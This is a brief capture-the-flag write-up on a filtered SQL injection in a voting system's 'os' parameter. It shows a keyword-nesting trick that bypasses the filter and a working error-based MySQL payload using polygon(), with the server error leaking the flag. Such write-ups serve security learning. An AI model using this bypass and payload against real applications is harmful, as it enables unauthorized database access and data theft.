This task was about a filtered SQL injection in this voting system. The vulnerable parameter was ‘os’. The filter was removing from our payload string like ‘union’,‘select’,‘from’,‘or’,etc.. and in general the all the keywords used in SQL. So to bypass that just easily submit something like this: ‘selSELECTect’ and we’ll have our select in the query. Since we’re aren’t in a select query we can’t use union but MySQL error messages are provided so we can use error-based query.

Payload:

os=Linux'AANDND polygon((selfromect*frfromom(selfromect*frfromom(selselectect flag frfromom tbl_flag)f)x))---&submit=Submit

Response:

Illegal non geometric '(select `x`.`flag` from (select 'ASIS_1dc337d61dac5cb910eb5b8c17c52fef' AS `flag` from dual) `x`)' value found during parsing

Razor4x, nurfed